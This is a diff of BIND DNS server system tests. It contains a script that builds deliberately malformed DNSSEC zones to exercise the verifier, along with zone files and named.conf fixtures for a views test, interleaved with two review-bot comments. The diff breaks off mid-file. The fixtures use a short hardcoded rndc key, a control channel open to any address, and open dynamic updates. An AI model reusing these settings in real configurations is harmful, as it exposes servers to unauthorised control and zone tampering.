@@ -0,0 +1,248 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +SYSTESTDIR=verify + +dumpit () { + echo_d "${debug}: dumping ${1}" + cat "${1}" | cat_d +} + +setup () { + echo_i "setting up $2 zone: $1" + debug="$1" + zone="$1" + file="$1.$2" + n=$((${n:-0} + 1)) +} + +# A unsigned zone should fail validation. +setup unsigned bad +cp unsigned.db unsigned.bad + +# A set of nsec zones. +setup zsk-only.nsec good +$KEYGEN -a ${DEFAULT_ALGORITHM} ${zone}> kg.out$n 2>&1 || dumpit kg.out$n +$SIGNER -SP -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +setup ksk-only.nsec good +$KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} > kg.out$n 2>&1 || dumpit kg.out$n +$SIGNER -SPz -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +setup ksk+zsk.nsec good +$KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} > kg1.out$n 2>&1 || dumpit kg1.out$n +$KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} > kg2.out$n 2>&1 || dumpit kg2.out$n +$SIGNER -SPx -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +setup ksk+zsk.nsec.apex-dname good +zsk=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2> kg1.out$n) || dumpit kg1.out$n +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2> kg2.out$n) || dumpit kg2.out$n +cp unsigned.db ${file}.tmp +echo "@ DNAME data" >> ${file}.tmp +$SIGNER -SP -o ${zone} -f ${file} ${file}.tmp > s.out$n || dumpit s.out$n + +# A set of nsec3 zones. 
+setup zsk-only.nsec3 good +$KEYGEN -a ${DEFAULT_ALGORITHM} ${zone}> kg.out$n 2>&1 || dumpit kg.out$n +$SIGNER -3 - -SP -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +setup ksk-only.nsec3 good +$KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} > kg.out$n 2>&1 || dumpit kg.out$n +$SIGNER -3 - -SPz -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +setup ksk+zsk.nsec3 good +$KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} > kg1.out$n 2>&1 || dumpit kg1.out$n +$KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} > kg2.out$n 2>&1 || dumpit kg2.out$n +$SIGNER -3 - -SPx -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +setup ksk+zsk.optout good +$KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} > kg1.out$n 2>&1 || dumpit kg1.out$n +$KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} > kg2.out$n 2>&1 || dumpit kg2.out$n +$SIGNER -3 - -A -SPx -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +setup ksk+zsk.nsec3.apex-dname good +zsk=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2> kg1.out$n) || dumpit kg1.out$n +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2> kg2.out$n) || dumpit kg2.out$n +cp unsigned.db ${file}.tmp +echo "@ DNAME data" >> ${file}.tmp +$SIGNER -3 - -SP -o ${zone} -f ${file} ${file}.tmp > s.out$n || dumpit s.out$n + +# +# generate an NSEC record like +# aba NSEC FOO ... +# then downcase all the FOO records so the next name in the database +# becomes foo when the zone is loaded. +# +setup nsec-next-name-case-mismatch good +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2> kg2.out$n) || dumpit kg2.out$n +zsk=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2> kg2.out$n) || dumpit kg2.out$n +cat << EOF > ${zone}.tmp +\$TTL 0 +@ IN SOA foo . ( 1 28800 7200 604800 1800 ) +@ NS foo +\$include $ksk.key +\$include $zsk.key +FOO AAAA ::1 +FOO A 127.0.0.2 +aba CNAME FOO +EOF +$SIGNER -zP -o ${zone} -f ${file}.tmp ${zone}.tmp > s.out$n || dumpit s.out$n +sed 's/^FOO\./foo\./' < ${file}.tmp > ${file} + +# A set of zones with only DNSKEY records. 
+setup zsk-only.dnskeyonly bad +key1=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2>kg.out) || dumpit kg.out$n +cat unsigned.db $key1.key > ${file} + +setup ksk-only.dnskeyonly bad +key1=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2>kg.out) || dumpit kg.out$n +cat unsigned.db $key1.key > ${file} + +setup ksk+zsk.dnskeyonly bad +key1=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2>kg.out) || dumpit kg.out$n +key2=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2>kg.out) || dumpit kg.out$n +cat unsigned.db $key1.key $key2.key > ${file} + +# A set of zones with expired records +s="-s -2678400" +setup zsk-only.nsec.expired bad +$KEYGEN -a ${DEFAULT_ALGORITHM} ${zone}> kg.out$n 2>&1 || dumpit kg.out$n +$SIGNER -SP ${s} -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +setup ksk-only.nsec.expired bad +$KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} > kg.out$n 2>&1 || dumpit kg.out$n +$SIGNER -SPz ${s} -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +setup ksk+zsk.nsec.expired bad +$KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} > kg1.out$n 2>&1 || dumpit kg1.out$n +$KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} > kg2.out$n 2>&1 || dumpit kg2.out$n +$SIGNER -SP ${s} -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +setup zsk-only.nsec3.expired bad +$KEYGEN -a ${DEFAULT_ALGORITHM} ${zone}> kg.out$n 2>&1 || dumpit kg.out$n +$SIGNER -3 - ${s} -SP -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +setup ksk-only.nsec3.expired bad +$KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} > kg.out$n 2>&1 || dumpit kg.out$n +$SIGNER -3 - ${s} -SPz -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +setup ksk+zsk.nsec3.expired bad +$KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} > kg1.out$n 2>&1 || dumpit kg1.out$n +$KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} > kg2.out$n 2>&1 || dumpit kg2.out$n +$SIGNER -3 - ${s} -SPx -o ${zone} -f ${file} unsigned.db > s.out$n || dumpit s.out$n + +# ksk expired +setup ksk+zsk.nsec.ksk-expired bad +zsk=$($KEYGEN -a 
${DEFAULT_ALGORITHM} ${zone} 2> kg1.out$n) || dumpit kg1.out$n +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2> kg2.out$n) || dumpit kg2.out$n +cat unsigned.db $ksk.key $zsk.key > $file +$SIGNER -Px -o ${zone} -f ${file} ${file} $zsk > s.out$n || dumpit s.out$n +$SIGNER ${s} -P -O full -o ${zone} -f ${file} ${file} $ksk > s.out$n || dumpit s.out$n +now=$(date -u +%Y%m%d%H%M%S) +exp=$(awk '$4 == "RRSIG" && $5 == "DNSKEY" { print $9;}' ${file}) +[ "${exp:-40001231246060}" -lt ${now:-0} ] || dumpit $file + +setup ksk+zsk.nsec3.ksk-expired bad +zsk=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2> kg1.out$n) || dumpit kg1.out$n +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2> kg2.out$n) || dumpit kg2.out$n +cat unsigned.db $ksk.key $zsk.key > $file +$SIGNER -3 - -Px -o ${zone} -f ${file} ${file} $zsk > s.out$n || dumpit s.out$n +$SIGNER -3 - ${s} -P -O full -o ${zone} -f ${file} ${file} $ksk > s.out$n || dumpit s.out$n +now=$(date -u +%Y%m%d%H%M%S) +exp=$(awk '$4 == "RRSIG" && $5 == "DNSKEY" { print $9;}' ${file}) +[ "${exp:-40001231246060}" -lt ${now:-0} ] || dumpit $file + +# broken nsec chain +setup ksk+zsk.nsec.broken-chain bad +zsk=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2> kg1.out$n) || dumpit kg1.out$n +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2> kg2.out$n) || dumpit kg2.out$n +cat unsigned.db $ksk.key $zsk.key > $file +$SIGNER -P -O full -o ${zone} -f ${file} ${file} $ksk > s.out$n || dumpit s.out$n +awk '$4 == "NSEC" { $5 = "'$zone'."; print } { print }' ${file} > ${file}.tmp +$SIGNER -Px -Z nonsecify -o ${zone} -f ${file} ${file}.tmp $zsk > s.out$n || dumpit s.out$n + +# bad nsec bitmap +setup ksk+zsk.nsec.bad-bitmap bad +zsk=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2> kg1.out$n) || dumpit kg1.out$n +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2> kg2.out$n) || dumpit kg2.out$n +cat unsigned.db $ksk.key $zsk.key > $file +$SIGNER -P -O full -o ${zone} -f ${file} ${file} $ksk > s.out$n || dumpit s.out$n +awk '$4 == "NSEC" && /SOA/ { $6=""; 
print } { print }' ${file} > ${file}.tmp +$SIGNER -Px -Z nonsecify -o ${zone} -f ${file} ${file}.tmp $zsk > s.out$n || dumpit s.out$n + +# extra NSEC record out side of zone +setup ksk+zsk.nsec.out-of-zone-nsec bad +zsk=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2> kg1.out$n) || dumpit kg1.out$n +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2> kg2.out$n) || dumpit kg2.out$n +cat unsigned.db $ksk.key $zsk.key > $file +$SIGNER -P -O full -o ${zone} -f ${file} ${file} $ksk > s.out$n || dumpit s.out$n +echo "out-of-zone. 3600 IN NSEC ${zone}. A" >> ${file} +$SIGNER -Px -Z nonsecify -O full -o ${zone} -f ${file} ${file} $zsk > s.out$n || dumpit s.out$n + +# extra NSEC record below bottom of zone +setup ksk+zsk.nsec.below-bottom-of-zone-nsec bad +zsk=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2> kg1.out$n) || dumpit kg1.out$n +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2> kg2.out$n) || dumpit kg2.out$n +cat unsigned.db $ksk.key $zsk.key > $file +$SIGNER -P -O full -o ${zone} -f ${file} ${file} $ksk > s.out$n || dumpit s.out$n +echo "ns.sub.${zone}. 3600 IN NSEC ${zone}. A AAAA" >> ${file} +$SIGNER -Px -Z nonsecify -O full -o ${zone} -f ${file}.tmp ${file} $zsk > s.out$n || dumpit s.out$n +# dnssec-signzone signs any node with a NSEC record. +awk '$1 ~ /^ns.sub/ && $4 == "RRSIG" && $5 != "NSEC" { next; } { print; }' ${file}.tmp > ${file} + +# extra NSEC record below DNAME +setup ksk+zsk.nsec.below-dname-nsec bad +zsk=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2> kg1.out$n) || dumpit kg1.out$n +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2> kg2.out$n) || dumpit kg2.out$n +cat unsigned.db $ksk.key $zsk.key > $file +$SIGNER -P -O full -o ${zone} -f ${file} ${file} $ksk > s.out$n || dumpit s.out$n +echo "sub.dname.${zone}. 3600 IN NSEC ${zone}. 
TXT" >> ${file} +$SIGNER -Px -Z nonsecify -O full -o ${zone} -f ${file} ${file} $zsk > s.out$n || dumpit s.out$n + +# missing NSEC3 record at empty node +# extract the hash fields from the empty node's NSEC 3 record then fix up +# the NSEC3 chain to remove it +setup ksk+zsk.nsec3.missing-empty bad +zsk=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2> kg1.out$n) || dumpit kg1.out$n +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2> kg2.out$n) || dumpit kg2.out$n +cat unsigned.db $ksk.key $zsk.key > $file +$SIGNER -3 - -P -O full -o ${zone} -f ${file} ${file} $ksk > s.out$n || dumpit s.out$n +a=$(awk '$4 == "NSEC3" && NF == 9 { split($1, a, "."); print a[1]; }' ${file}) +b=$(awk '$4 == "NSEC3" && NF == 9 { print $9; }' ${file}) +awk ' +$4 == "NSEC3" && $9 == "'$a'" { $9 = "'$b'"; print; next; } +$4 == "NSEC3" && NF == 9 { next; } +{ print; }' ${file} > ${file}.tmp +$SIGNER -3 - -Px -Z nonsecify -O full -o ${zone} -f ${file} ${file}.tmp $zsk > s.out$n || dumpit s.out$n + +# extra NSEC3 record +setup ksk+zsk.nsec3.extra-nsec3 bad +zsk=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2> kg1.out$n) || dumpit kg1.out$n +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -fK ${zone} 2> kg2.out$n) || dumpit kg2.out$n +cat unsigned.db $ksk.key $zsk.key > $file +$SIGNER -3 - -P -O full -o ${zone} -f ${file} ${file} $ksk > s.out$n || dumpit s.out$n +awk ' +BEGIN { + ZONE="'${zone}'."; +} +$4 == "NSEC3" && NF == 9 { + $1 = "H9P7U7TR2U91D0V0LJS9L1GIDNP90U3H." ZONE; + $9 = "H9P7U7TR2U91D0V0LJS9L1GIDNP90U3I"; + print; +}' ${file} > ${file}.tmp +cat ${file}.tmp >> ${file} +rm -f ${file}.tmp +$SIGNER -3 - -Px -Z nonsecify -O full -o ${zone} -f ${file} ${file} $zsk > s.out$n || dumpit s.out$n diff --git a/bin/tests/system/verify/zones/unsigned.db b/bin/tests/system/verify/zones/unsigned.db new file mode 100644 index 0000000..1e7cd2b --- /dev/null +++ b/bin/tests/system/verify/zones/unsigned.db 
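Review bot: In the three `*.dnskeyonly` blocks the key generator's stderr is redirected to `kg.out`, but the failure handler reads `kg.out$n`, so when `$KEYGEN` fails `dumpit` is pointed at a file that was never written and the real error is lost. The redirect should use the per-step name, e.g. `key1=$($KEYGEN -a ${DEFAULT_ALGORITHM} ${zone} 2>kg.out$n) || dumpit kg.out$n`, with a distinct file for `key2` in the `ksk+zsk.dnskeyonly` block. The `nsec-next-name-case-mismatch` block has a similar slip: both the ksk and the zsk call write to `kg2.out$n`, so the second overwrites the first. Separately, `|| dumpit` only prints the log and the script carries on, so a failed key generation or signing step surfaces later as a confusing verify result; whether that is intended is not visible here.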
@@ -0,0 +1,29 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+@ SOA . . 0 0 0 2419200 3600 ; 28 day expire
+@ NS .
+data A 1.2.3.4
+dname DNAME data
+longttl 2419200 A 1.2.3.4
+sub.dname TXT sub.dname
+sub.empty TXT sub.empty
+sub NS ns.sub
+ns.sub A 1.2.3.4
+ns.sub AAAA 2002::1.2.3.4
+ns.sub WKS 1.2.3.4 udp domain
+other.sub TXT other.sub
+secure NS secure
+secure DS 1312 50 100 96EEB2FFD9B00CD4694E78278B5EFDAB0A80446567B69F634DA078F0
+secure A 1.2.3.4
+secure AAAA 2002::1.2.3.4
+out-of-zone. A 1.2.3.4
diff --git a/bin/tests/system/views/clean.sh b/bin/tests/system/views/clean.sh
new file mode 100644
index 0000000..d644c2a
--- /dev/null
+++ b/bin/tests/system/views/clean.sh
@@ -0,0 +1,38 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+set -e
+
+#
+# Clean up after zone transfer tests.
+#
+
+rm -f ns*/named.conf
+rm -f ns3/example.bk dig.out.ns?.?
+rm -f ns2/example.db ns3/internal.bk
+rm -f -- */*.jnl
+rm -f -- */named.memstats
+rm -f -- */named.run */named.run.prev
+rm -f ns2/external/K*
+rm -f ns2/external/inline.db.jbk
+rm -f ns2/external/inline.db.signed
+rm -f ns2/external/inline.db.signed.jnl
+rm -f ns2/internal/K*
+rm -f ns2/internal/inline.db.jbk
+rm -f ns2/internal/inline.db.signed
+rm -f ns2/internal/inline.db.signed.jnl
+rm -f ns2/zones.conf
+rm -f ns2/db.* ns2/K*
+rm -f dig.out.external dig.out.internal
+rm -f ns*/named.lock
+rm -f ns*/managed-keys.bind* ns*/*.mkeys*
diff --git a/bin/tests/system/views/ns1/named.conf.in b/bin/tests/system/views/ns1/named.conf.in
new file mode 100644
index 0000000..eb079c9
--- /dev/null
+++ b/bin/tests/system/views/ns1/named.conf.in
@@ -0,0 +1,29 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
diff --git a/bin/tests/system/views/ns1/root.db b/bin/tests/system/views/ns1/root.db
new file mode 100644
index 0000000..17780d1
--- /dev/null
+++ b/bin/tests/system/views/ns1/root.db
@@ -0,0 +1,24 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+. IN SOA gson.nominum.com. a.root.servers.nil. (
+ 2000042100 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+. NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.1
+
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
diff --git a/bin/tests/system/views/ns2/1.10.in-addr.arpa.db b/bin/tests/system/views/ns2/1.10.in-addr.arpa.db
new file mode 100644
index 0000000..7ca723d
--- /dev/null
+++ b/bin/tests/system/views/ns2/1.10.in-addr.arpa.db
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ IN SOA . . 0 0 0 0 0
+@ IN NS .
diff --git a/bin/tests/system/views/ns2/clone.db b/bin/tests/system/views/ns2/clone.db
new file mode 100644
index 0000000..0f2de76
--- /dev/null
+++ b/bin/tests/system/views/ns2/clone.db
@@ -0,0 +1,25 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600
+@ IN SOA mname1. . (
+ 2 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+@ IN NS ns2
+ns2 IN A 10.53.0.2
+
+a IN A 10.1.0.1
+child IN NS ns3.child
+ns3.child IN A 10.53.0.3
diff --git a/bin/tests/system/views/ns2/example1.db b/bin/tests/system/views/ns2/example1.db
new file mode 100644
index 0000000..4d60ce3
--- /dev/null
+++ b/bin/tests/system/views/ns2/example1.db
@@ -0,0 +1,28 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN .
+$TTL 300 ; 5 minutes
+example IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
+
+$ORIGIN example.
+a A 10.0.0.1
+ MX 10 mail.example.
+
+mail A 10.0.0.2
diff --git a/bin/tests/system/views/ns2/example2.db b/bin/tests/system/views/ns2/example2.db
new file mode 100644
index 0000000..966240e
--- /dev/null
+++ b/bin/tests/system/views/ns2/example2.db
@@ -0,0 +1,28 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN .
+$TTL 300 ; 5 minutes
+example IN SOA mname1. . (
+ 2 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+example. NS ns2.example.
+ns2.example. A 10.53.0.4
+
+$ORIGIN example.
+a A 10.0.0.1
+ MX 10 mail.example.
+
+mail A 10.0.0.2
diff --git a/bin/tests/system/views/ns2/external/inline.db b/bin/tests/system/views/ns2/external/inline.db
new file mode 100644
index 0000000..16d53b9
--- /dev/null
+++ b/bin/tests/system/views/ns2/external/inline.db
@@ -0,0 +1,29 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+inline. IN SOA mname1. . (
+ 2 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+inline. NS ns2.inline.
+ns2.inline. A 10.53.0.2
+inline. NS ns3.inline.
+ns3.inline. A 10.53.0.3
+
+$ORIGIN inline.
+a A 10.1.0.1
+ MX 10 extmail.inline.
+
+extmail A 10.1.0.2
diff --git a/bin/tests/system/views/ns2/internal.db b/bin/tests/system/views/ns2/internal.db
new file mode 100644
index 0000000..4f1014f
--- /dev/null
+++ b/bin/tests/system/views/ns2/internal.db
@@ -0,0 +1,30 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN .
+$TTL 300 ; 5 minutes
+example IN SOA mname1. . (
+ 2 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+example. NS ns2.example.
+ns2.example. A 10.53.0.2
+example. NS ns3.example.
+ns3.example. A 10.53.0.3
+
+$ORIGIN example.
+a A 10.1.0.1
+ MX 10 intmail.example.
+
+intmail A 10.1.0.2
diff --git a/bin/tests/system/views/ns2/internal/inline.db b/bin/tests/system/views/ns2/internal/inline.db
new file mode 100644
index 0000000..7a30873
--- /dev/null
+++ b/bin/tests/system/views/ns2/internal/inline.db
@@ -0,0 +1,29 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+inline. IN SOA mname1. . (
+ 2 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+inline. NS ns2.inline.
+ns2.inline. A 10.53.0.2
+inline. NS ns3.inline.
+ns3.inline. A 10.53.0.3
+
+$ORIGIN inline.
+a A 10.1.0.1
+ MX 10 intmail.inline.
+
+intmail A 10.1.0.2
diff --git a/bin/tests/system/views/ns2/named1.conf.in b/bin/tests/system/views/ns2/named1.conf.in
new file mode 100644
index 0000000..857235d
--- /dev/null
+++ b/bin/tests/system/views/ns2/named1.conf.in
@@ -0,0 +1,53 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+ allow-update { any; };
+};
+
+zone "inline" {
+ type primary;
+ file "external/inline.db";
+ key-directory "external";
+ auto-dnssec maintain;
+ inline-signing yes;
+};
diff --git a/bin/tests/system/views/ns2/named2.conf.in b/bin/tests/system/views/ns2/named2.conf.in
new file mode 100644
index 0000000..f8759fb
--- /dev/null
+++ b/bin/tests/system/views/ns2/named2.conf.in
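Review bot: The `controls` block accepts rndc connections from `allow { any; }` and authenticates them with the short fixed secret `1234abcd8765`, and the `example` zone sets `allow-update { any; }`, with nothing in the file saying these are test-only values. The same key and open control ACL recur in ns2/named2.conf.in, ns2/named3.conf.in, ns3/named1.conf.in and ns3/named2.conf.in. I would add a comment above the key, e.g. `/* System-test fixture: fixed rndc key and open ACLs; not for use outside the test network. */`, so the stanza is not copied into a real configuration. If the test harness allows it, narrowing `allow { any; }` to the 10.53.0.x test addresses would also limit exposure should a test server be left running; whether the harness's rndc calls originate from those addresses is not visible here.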
@@ -0,0 +1,100 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+view "internal" {
+ match-clients { 10.53.0.2;
+ 10.53.0.3; };
+
+ zone "." {
+ type hint;
+ file "../../common/root.hint";
+ };
+
+ zone "example" {
+ type primary;
+ file "internal.db";
+ allow-update { any; };
+ };
+
+ zone "clone" {
+ type primary;
+ file "clone.db";
+ allow-update { any; };
+ };
+
+ zone "1.10.in-addr.arpa" {
+ type primary;
+ file "1.10.in-addr.arpa.db";
+ };
+
+ zone "inline" {
+ type primary;
+ file "internal/inline.db";
+ key-directory "internal";
